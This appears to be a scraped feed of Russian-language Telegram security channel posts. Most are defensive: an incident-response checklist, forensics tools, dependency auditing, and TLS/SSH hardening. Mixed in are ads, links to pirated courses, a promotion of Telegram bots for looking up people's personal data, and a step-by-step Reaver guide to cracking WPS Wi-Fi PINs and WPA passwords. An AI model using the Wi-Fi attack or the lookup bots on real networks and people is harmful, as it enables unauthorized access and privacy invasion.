CodeGuard: CyberSec Edition

RECURA — лента самых свежих и ценных ресурсов для развития твоих навыков. Cобраны материалы по программированию, DevOps, Linux и безопасности с реальными кейсами: 🤔 InfoSec & Хакинг 🖥 SQL & Базы Данных 👩‍💻 Bash & Shell 👩‍💻 C# & Unity 👩‍💻 Python 👩‍💻 C/C++ 👩‍💻 Java 👩‍💻 Linux 🖼️ DevOps 📱 JavaScript 👩‍💻 Backend 📱 GitHub & Git 📌 Гайды, шпаргалки, книги, задачи и ресурсы для каждого.

🚨 Первые 15 минут на скомпрометированном Linux‑хосте: как спастись?? — Вы набрали кучу реакций, поэтому давайте разберем чек‑лист о том, как правильно собрать данные в первые критические минуты, пока система ещё работает и пока злоумышленник не закрыл следы 🖥 В чём суть проблемы? >> Когда ты понимаешь, что хост скомпрометирован, у тебя есть всего лишь 10–15 минут, придется поторопится >> Память теряется при перезагрузке, логи могут быть стёрты, процессы закрыты >> Нужно действовать быстро и систематично, иначе важные данные потеряются бесследно 🌟 Времени у нас очень мало, минута за минутой повторяйте что делать: 1️⃣ Зафиксируем время и залогиненных пользователей

date && timedatectl
w
who

🎥 Узнаём точное время системы (потом совместим с логами) 🎥 Видим, кто ещё на хосте прямо сейчас 2️⃣ Процессы и сетевые соединения

ps auxww
netstat -tlnup
ss -tlnup
netstat -an | grep ESTABLISHED

🎥 Ловим подозрительные процессы 🎥 Видим, с какими хостами система общается 3️⃣ Пользователи и их история

cat /etc/passwd
lastlog
last -f /var/log/wtmp
last -f /var/log/btmp

🎥 Находим новых юзеров, которых добавил злоумышленник 🎥 Видим, откуда и когда заходили 4️⃣ Persistence — ищем чёрные двери

crontab -l
for user in $(cat /etc/passwd | cut -d: -f1); do crontab -u $user -l 2>/dev/null; done
find /bin /sbin -type f -mtime -1
find /root /home -name "authorized_keys" 2>/dev/null

🎥 Проверяем cron (злоумышленники любят планировать там задачи) 🎥 Ищем недавно изменённые бинарники 🎥 Смотрим новые SSH‑ключи для повторного входа 5️⃣ Логи и истории команд

history
sudo cat /root/.bash_history
tail -100 /var/log/auth.log
journalctl -xe --lines=50

🎥 Видим, какие команды запускались и когда 🎥 Понимаем, с какого момента пошла беда 6️⃣ Сеть и маршруты

route -n
ip route show
arp -a
lsof -i -P -n | grep LISTEN
lsof -i -P -n | grep ESTABLISHED

🎥 Проверяем маршруты (не завёл ли злоумышленник перехват) 🎥 Видим, куда ходит трафик 7️⃣ Архивируем всё

sudo tar czf /tmp/incident-data.tar.gz \
  /var/log/auth.log /var/log/syslog \
  /root/.bash_history /home/*/.bash_history \
  /etc/passwd /etc/crontab

🎥 Сохраняем на USB или отправляем на безопасный хост 🎥 Всё должно уходить до отключения системы 🧚‍♀️ После этих 15 минут ты будешь иметь снимок состояния хоста, но что же делать дальше? 1. Отключаем сеть, чтобы остановить атаку 2. Снимаем образ диска для офлайн‑анализа 3. Передаем данные форензик‑команде 🧘‍♂️ Принципы, которые спасут вашу систему: — Не паникуем: систематичность важнее скорости — Ни в коем случае не перезагружаем систему: память сотрётся — Копируем всё: лучше иметь лишнее, чем потом лазить по удалённым логам — Две проверки: используем разные команды для одного действия (netstat + ss, ps + /proc) — Не трогаем без надобности: каждое действие меняет временные метки 📎 Сохрани этот чек‑лист в избранные, пригодиться в реальной ситуации 😈 CodeGuard: PySec Edition | Чат

🔍 OSINT‑боты в Telegram: тестируем и выбираем лучший

«~» В телеге есть целый класс разнообразных ботов для пробива, но какой из них действительно лучший? Протестируем три популярных инструмента на одинаковых критериях и поймем какой именно выгоднее юзать в 25 году

🤩 Три участника теста:

1) Sherlock — самый популярный и универсальный инструмент, быстро выдаёт отчёт со ссылками на найденные профили, но иногда есть проблемы с открытием HTML‑отчётов Стоимость: $0,1 за запрос 2) OVERLOAD — Показывает телеграм ID, юзернейм, публичные чаты, выявляет паттерны активности Стоимость: $0,2–0,7 за запрос 3) Fun-stat-bot — Не даёт персональные данные, но анализирует поведение. Показывает время онлайна, паттерны активности, частоту сообщений, ссылки на реальные сообщения из чатов Стоимость: $0,15–0,3 за запрос

🏆 Результаты и выводы 🎥 Sherlock — лучший для быстрого старта расследования и универсальности 🎥 OVERLOAD — лучший по точности и качеству визуализации, самый практичный 🎥 Fun-stat-bot — идеальное дополнение для анализа поведения и активности (Лучше всегда проверять совпадения между двумя ботами минимум) 🔗 Актуальные ссылки на ботов: — Sherlock: https://t.me/Popnewstar_bot — OVERLOAD: https://t.me/OLR_ROBOT — Fun-stat-bot: https://t.me/pro_mess_bot ➡️ Подробнее о самих тестах и как правильно выбрать бота, читайте в оригинальной статье 😈 CodeGuard: PySec Edition | Чат

Знаете, зачем вас набирают в Телеграме или ВК незнакомые номера? Посмотрите видео выше — насколько легко узнать IP-адрес любого юзера через звонок. Простых способов узнать о вас практически всё — сотни, и если вы хотите соблюдать хотя бы минимум сетевой гигиены — подпишитесь на @package_security. Это канал опытного айтишника, который расскажет вам всё об уловках хакеров/мошенников, а также поделится лайфхаками и инсайдами. @package_security — ваша анонимность скажет вам «спасибо».

👁️ Инструменты и методы анализа цепочек поставок в ИБ

Нормальный процесс анализа цепочки это не один npm audit, а полноценная связка: SBOM —> аудит зависимостей —>политики в CI/CD —> мониторинг уже релизнутых артефактов Разберем ее подробнее

🌟 SBOM — это инвентаризация компонентов приложения: библиотеки, версии, лицензии, источники. Это очень важная штука, так как без нее вы даже не узнаете, затронул ли вас очередной Log4j‑момент Пример генерации SBOM в формате CycloneDX для Python‑проекта:

pip install cyclonedx-bom

cyclonedx-py \
  --format json \
  --outfile sbom.json

Или для контейнера (через Syft):

syft my-registry.local/app:latest -o cyclonedx-json=sbom.json

🥶 Анализируем зависимости: ловим уязвимости и злые пакеты — SCA‑инструменты и SBOM‑сканеры пробегают по зависимостям, прикручивают CVE, лицензии и находят подозрительные компоненты Минимальная проверка Python‑зависимостей через pip-audit:

pip install pip-audit

pip-audit -r requirements.txt

В CI/CD можно добавить жёсткий режим (сборка упадет при критической уязвимости):

pip-audit -r requirements.txt --strict

Пример проверки SBOM через Dependency-Track API:

curl -X POST https://dtrack/api/v1/bom \
  -H "X-Api-Key: <API_KEY>" \
  -F "project=<PROJECT_UUID>" \
  -F "bom=@sbom.json"

🤫 Политики в CI/CD: не пускаем всякий мусор в прод — Будем действовать по такому принципу: если в цепочку зависимостей залетаеи что‑то опасное, то билд не проходит или помечается Пример простого шага в GitHub Actions:

- name: Generate SBOM
  run: |
    pip install cyclonedx-bom pip-audit
    cyclonedx-py --format json --outfile sbom.json

- name: Audit dependencies
  run: |
    pip-audit -r requirements.txt --strict

Дальше уже можем добавлять свои правила: 🎥 Стоп, если есть CVE с CVSS >= 8 🎥 Стоп, если лицензия из чёрного списка 🎥 Предупреждение, если пакет только что появился и у него 0 репутации 💬 Мониторинг уже релизнутых артефактов: — Цепочка поставок не заканчивается на релизе, так как новые хитровыебанные CVE выходят постоянно, и нужно понимать, какие сервисы какие сервисы под угрозой, для этого:

1) Сохраним SBOM рядом с каждым релизом 2) Кормим их в платформу типа Dependency-Track (ну или любой понравившийся вам аналог 3) Настраиваем алерты: вышла новая CVE для компонента из вашего SBOM X/Y/Z

😈 CodeGuard: PySec Edition | Чат

😍 TryHackMe-Roadmap: 350+ бесплатных комнат по ИБ в одном репозитории

«~» Шедевро-репозиторий представляет собой живую подборку из нескольких сотен бесплатных комнат TryHackMe, разложенных по удобным разделам с разными уровнями и темами

📌 Какие разделы есть внутри:

🎥 Fundamentals: вводные комнаты, Linux/Windows‑база, принципы безопасности, первые пентест‑сценарии 🎥 Тематические ветки: Recon, Scripting, Web, Forensics, Malware Analysis, PrivEsc, Active Directory, PCAP, Buffer Overflow 🎥 CTF‑блоки: CTF всех уровней + спец‑ивенты вроде Advent of Cyber, чтобы качать навык решения задач под разным уровнем боли в пятой точке

🤩 Репозиторий удобно использовать как чек‑лист для обучения кибербезу — отметили, что уже прошли, выбрали следующую тему, закрепили практикой на TryHackMe без бесконечного скролла каталога комнат. Все просто 😏 😈 CodeGuard: PySec Edition | Чат

😍 TryHackMe-Roadmap: 350+ бесплатных комнат по ИБ в одном репозитории

«~» Шедевро-репозиторий представляет собой живую подборку из нескольких сотен бесплатных комнат TryHackMe, разложенных по удобным разделам с разными уровнями и темами

📌 Какие разделы есть внутри:

🎥 Fundamentals: вводные комнаты, Linux/Windows‑база, принципы безопасности, первые пентест‑сценарии 🎥 Тематические ветки: Recon, Scripting, Web, Forensics, Malware Analysis, PrivEsc, Active Directory, PCAP, Buffer Overflow 🎥 CTF‑блоки: CTF всех уровней + спец‑ивенты вроде Advent of Cyber, чтобы качать навык решения задач под разным уровнем боли в пятой точке

🤩 Репозиторий удобно использовать как чек‑лист для обучения кибербезу — отметили, что уже прошли, выбрали следующую тему, закрепили практикой на TryHackMe без бесконечного скролла каталога комнат. Все просто 😏 😈 CodeGuard: PySec Edition | Чат

⚡️⚠️📊Сделал подборку рекомендую вам ознакомьтесь 🤙 • Арсенал Безопасника — Лучшие инструменты для хакинга и OSINT • Хакер | Red Team — Библиотека Хакера тут вы найдете только эксклюзив! Автор делится лучшим. (новинка) • Max Open Source — Полезные статьи и бесплатные курсы по этическому хакингу, пентесту, программированию и информационным технологиям. • IT MEGA — Тут эксклюзивные материалы, курсы по программированию, информационная безопасность хакингу, Osint и IT. • Книги | Books — Одна из крупных библиотек в сегменте Telegram. Тысячи книг и полезного материала. • Библиотека Cobalt Strike — Все для знакомства с хакингом, пентестом, эксклюзивной информация, курсы, книги, статьи и инструменты. • Журнал Хакер — Журнал хакер, канал архив, все выпуски с 1999- до последнего! Удивительный мир! • Библиотека разведчика Osint — Единственная в своем роде библиотека по теме OSINT, разведки в сети, сбору информации, технологии конкурентной разведки, поиск о цели. ‼️ В общей сложности, данные проекты насчитывают терабайты курсов и книг. Присоединяйся 📲💻

🧬 Linux-форензика: с чего нужно начать разбор системы? — Собрал для вас мини‑подборку по Linux‑форензике со шпаргалками команд, тулкитами и утилитами для живого анализа и последующего разбора образов 💬 Шпаргалки и методички:

1️⃣ Linux Command Line Forensics and Intrusion Detection — Набор базовых команд для быстрого осмотра живой Linux‑системы: процессы, сетевые соединения, пользователи, cron, бинарники, логи 2️⃣ Linux Forensics Cheatsheet — Краткие сводки по основным артефактам: auth‑логи, системные журналы, history, bashrc, SSH‑ключи, cron, временные файлы 3️⃣ Linux Forensic Artifact Cheatsheet — Шпаргалка с фокусом на артефакты и инструменты: LiME и AVML для дампа памяти, Volatility и Rekall для анализа, Sleuth Kit и Autopsy для дисков, Plaso и log2timeline для таймлайнов

👁️ Инструменты и дистрибутивы:

4️⃣ LiME и AVML — LiME и AVML позволяют аккуратно снять дамп RAM с Linux‑системы, чтобы потом разбирать его 5️⃣ Volatility и Rekall — Фреймворки для работы с дампами: процессы, модули ядра, скрытые процессы, сетевые сессии, артефакты малвари 6️⃣ The Sleuth Kit — Набор утилит и GUI‑оболочка для анализа образов дисков: файловые системы, удалённые файлы, метаданные, временные метки, артефакты браузера и пользователя 7️⃣ Plaso — Инструмент, который собирает события из логов, файловой системы и артефактов в единый временной ряд

🤡 Живой IR и автоматизация

8️⃣ Linux live forensics — Практические разборы инцидентов на живых Linux‑серверах: какие данные собирать в первые минуты, чем это грозит для целостности артефактов и как автоматизировать сбор 9️⃣ LINReS — Open source‑скрипт под live‑IR: собирает volatile и non‑volatile данные с подозрительного хоста и отправляет их на форензик‑станцию по заранее поднятым каналам

Набираем 15 реакций и я дропаю минимальный чек‑лист по теме «Что сделать в первые 10–15 минут на скомпрометированном Linux‑хосте» с конкретными командами 🔑 😈 CodeGuard: PySec Edition | Чат

🧠 С ЭТИМ САЙТОМ ТЫ СОВЕРШЕННО БЕСПЛАТНО ПРОЙДЕШЬ ВСЮ БАЗУ ПО ИИ И РАБОТЕ С ДАННЫМИ 🫶 Что это за чудо такое? 🎥 Cognitive Class — образовательная платформа от IBM с сотней бесплатных курсов и проектов по искусственному интеллекту, data science и облачным технологиям и смежным темам 📚 Темы, которые закрывает платформа:

— Базовый и продвинутый data science: Python, анализ данных, визуализация, машинное обучение, работа с реальными датасетами — ИИ и ML: вводные по AI, классические алгоритмы, нейросети, NLP, компьютерное зрение — Облака и big data: основы cloud‑вычислений, работа с Hadoop и Spark, построение решений в облаке

📎 Отдельный плюс: За прохождение многих треков можно получить сертификаты и бейджи, которые удобно прикладывать к резюме и профилю 😈 CodeGuard: PySec Edition | Чат

☄️В преддверии Нового года айтишник из “Matrix” скупил все курсы топовых IT-школ и выложил 5 ТБ слитых курсов к себе в каналы! 👩‍💻 Python: https://t.me/+kBPlIQ1kpHw0YmQy 👩‍💻 Все ЯП: https://t.me/+pkvOZc3g5gU3YTEy 👩‍💻 Backend: https://t.me/+QRq_LSpodJ80NjE6 📱 Frontend и Web: https://t.me/+jOItOzJamrNhOTIy 👩‍💻 Графика и дизайн: https://t.me/+lxe3X0QQXVk2NWIy Все материалы в закрепе и постоянно пополняются👆

🔐 АТАКУЕМ WI-FI C WPS ПРИ ИСПОЛЬЗОВАНИИ REAVER — Практический гайд

«~» WPS — это удобная настройка Wi‑Fi по кнопке или пину, которая сильно упрощает жизнь пользователю, но делает сеть уязвимой для перебора. В статье по ссылке говорится как правильно провести этот самый перебор. Делюсь своим опытом, как я организовывал подобную атаку по данному материалу

🤩 Шаг 1. Готовим карту и систему: Нам понадобится карта с режимом монитора и инъекциями (Atheros часто ведёт себя лучше всего с Reaver) — Отключаем всё лишнее:

sudo systemctl stop NetworkManager
sudo airmon-ng check kill

— Смотрим интерфейс:

sudo iw dev

— Переводим wlan0 в монитор‑режим:

sudo ip link set wlan0 down
sudo iw wlan0 set monitor control
sudo ip link set wlan0 up

🔍 Шаг 2. Ищем точки с включённым WPS: Для разведки возьмем wash (идёт в комплекте с Reaver)

sudo wash -i wlan0

— Ждем пару минут и смотрим колонки: 🎥 BSSID – MAC точки 🎥 Ch – канал 🎥 WPS – версия WPS 🎥 Lck – блокировка WPS (No — интересует, Yes — можно пройти мимо) 🎥 ESSID – имя сети (Для атаки подойдут только те, у кого Lck = No) 💀 Шаг 3. Проверим Pixie Dust через Reaver: Если точка уязвима к Pixie Dust, PIN можно вытащить почти сразу, без долгого онлайнового перебора — Берем BSSID из вывода wash, например:

EE:43:F6:CF:C3:08

— Запускаем проверку:

sudo reaver -i wlan0 -b EE:43:F6:CF:C3:08 -K

— Если роутер уязвим, Reaver покажет PIN вида:

WPS pin: 36158805

(На этом этапе у нас есть PIN, но все ещё нет WPA‑пароля) 👾 Шаг 4. Полный перебор WPS PIN, если Pixie не зашёл: Если Pixie Dust не сработал и PIN’ы не подошли, остаётся классический перебор:

sudo reaver -i wlan0 -b EE:43:F6:CF:C3:08 -vv

— Ключи -v/-vv/-vvv увеличивают подробность вывода и помогают понять, на чём всё ломается >> За счёт уязвимости протокола WPS реальное пространство перебора — всего около 11 000 комбинаций, а не десятки миллионов, поэтому это задача на пару часов для опытных спецов 🤲 Шаг 5. Если у нас уже есть PIN, то достаем WPA‑пароль: Если PIN уже известен, можно попросить Reaver вытащить WPA‑пароль напрямую:

sudo reaver -i wlan0 -b EE:43:F6:CF:C3:08 -p 36158805 -vv

— В успешном сценарии на выходе получаю строку с PSK: это и есть пароль от Wi‑Fi 🛡 Как наоборот защититься от атак? >> С точки зрения защиты единственный надёжный шаг, это отключить WPS с PIN в настройках роутера. Если производитель позволяет, плюсом включить блокировку WPS 😈 CodeGuard: PySec Edition | Чат

👾 «Реагирование на инциденты и управление рисками безопасности»: Практический курс про то, как работать с реальными инцидентами — Разработан под тех, кто хочет уметь не только ловить алерты, но и разруливать последствия для бизнеса, даже когда ресурсов и людей минимум 🌐 Что разберёте на курсе:

— Как выстраивать процесс реагирования от обнаружения атаки и разбора логов до ликвидации и пост‑анализа — Как работать с киберрисками: выявлять активы и уязвимости, оценивать влияние инцидента на бизнес, выбирать, какие риски можно реально снижать, а какие наоборот осознанно принимать — Как использовать open source‑инструменты и простые практики, когда SIEM за миллионы не завезли, а инциденты уже есть

💡 Также приятно то, что упор сделан на реальные кейсы и разбор типовых факапов: ошибки в коммуникации, неправильную приоритизацию, отсутствие плана IRP и документации — все то, что в жизни ломается куда чаще, чем сами технологии. ➡️ Забрать курс 😈 CodeGuard: PySec Edition | Чат

Держите 6 хороших каналов по искусственному интеллекту и нейросетям для любого уровня. Можешь выбрать сам: 🤖 AI — @ai_prompt 📱 Нейросети — @neuro_prompt 📱 Python — @python_prompt 🤔 InfoSec — @infosec_prompt 👩‍💻 IT Новости — @it_news 😄 IT Мемы — @it_memes Обучение, правильные промпты, разборы и полезные ресурсы на каждую тему!

Готовлю новый канал CodeGuard: Academy Сижу над ним потно, чтобы там было прям годнота для своих. Поддержи подпиской: тебе секунда, а мне мотивация пилить контент. 👉 https://t.me/+XI5KQ-XdAow3YWMy 😈 CodeGuard: PySec Edition | Чат

🧠 «Социальная инженерия и этичный хакинг на практике» Джо Грея — это практический мануал по тому, как этично закрывать дырки в процессах безопасности

Книга показывает, почему даже идеально настроенный периметр бессилен, если сотрудники сами выдают доступы, кликают по ссылкам и доверяют админам по телефону

🌟 Что внутри книги? — Психология атак: какие триггеры используют социнженеры и как из них собираются сценарии фишинга — Практический OSINT и подготовка атак, как по открытым источникам собрать досье на компанию и людей — Этичный пентест людей: структуры фишинговых кампаний + рекомендации, как результаты таких тестов превращать в обучение 💡 Чем так хороша эта книга? >> Она является хорошим мостом между технарями и человеческим периметром. После прочтения книги проще объяснить бизнесу, почему защиты от людей нужны не меньше, чем новый firewall 📕 Ссылка на книгу как всегда в нашем архиве — [ARCHIVE] 😈 CodeGuard: PySec Edition | Чат

⚠️ Git: мини-шпаргалка по жизненному циклу изменений 1️⃣ Working Directory: Здесь правите файлы, запускаете тесты и ломаете всё, что можно —git add: нужен, чтобы перенести выбранные изменения в подготовительную область 2️⃣ Staging: Снимок того, что пойдёт в следующий коммит —git commit: зафиксировать содержимое staging в локальном репозитории 3️⃣ Local Repository: История всех ваших коммитов на машине —git push: отправить локальные коммиты на сервер —git fetch: забрать новые коммиты с сервера без слияния —git pull – fetch + авто‑слияние в текущую ветку 5️⃣ Stash: Когда нужно убрать со стола, но ещё рано коммитить — git stash: спрятать незакоммиченные изменения — git stash apply: вернуть изменения, не очищая stash — git stash pop: вернуть и одновременно удалить запись из stash 5️⃣ Remote Repository — Общий репо проекта на GitHub / GitLab / Bitbucket, куда пушит вся команда 😈 CodeGuard: PySec Edition | Чат

🥷 Стажировки и вакансии по ИБ и OSINT - Вакансии которых нет на джоб-агрегаторах - Только прямые контакты HR в Telegram 👉 @jobs_ib Пока другие листают джоб-сайты — ты уже пишешь HR в Telegram.

🔐 Практика: как руками проверить и подкрутить безопасные протоколы связи

«~» Теорию про знает каждый второй, а вот тех, кто реально открывал конфиг и бил по нему в разы меньше. Подготовил для вас практический чек-лист, который подойдет к любому серверу

1️⃣ Проверяем TLS: что торчит наружу — Быстрый скан протоколов и шифров:

nmap --script ssl-enum-ciphers -p 443 example.com

В выводе смотрим: 🎥 Отключены ли SSLv2/3 и старые TLS 1.0/1.1 🎥 Нет ли древних шифров вроде 3DES/RC4 🎥 Используется ли современный TLS 1.2/1.3 с AES‑GCM или CHACHA20 2️⃣ Смотрим сертификат через openssl

echo QUIT | openssl s_client -connect example.com:443 2>/dev/null \
  | openssl x509 -noout -issuer -dates -subject

— Проверяем кто выдал сертификат, не истёк ли он и корректен ли subject/сан‑имена. Полезно для быстрой диагностики и проверки сторонних сервисов без GUI 3️⃣ Жёстко настраиваем SSH, акцентируем внимание на ключи и современные шифры — Резервная копия и правка конфига:

sudo cp /etc/ssh/sshd_config /etc/ssh/sshd_config.bak
sudo nano /etc/ssh/sshd_config

Базовый набор, который стоит включить почти везде:

Protocol 2
PasswordAuthentication no
PermitRootLogin no
ClientAliveInterval 300
ClientAliveCountMax 2

После изменений:

sudo systemctl restart sshd

— Так вы режете логин по паролю, прямой root и вешаете таймаут на вечные зависшие сессии После такого цикла безопасность протоколов начинает ощущаться как осязаемый набор рычагов, за которые можно дёргать самому, пользуемся 😎 😈 CodeGuard: PySec Edition | Чат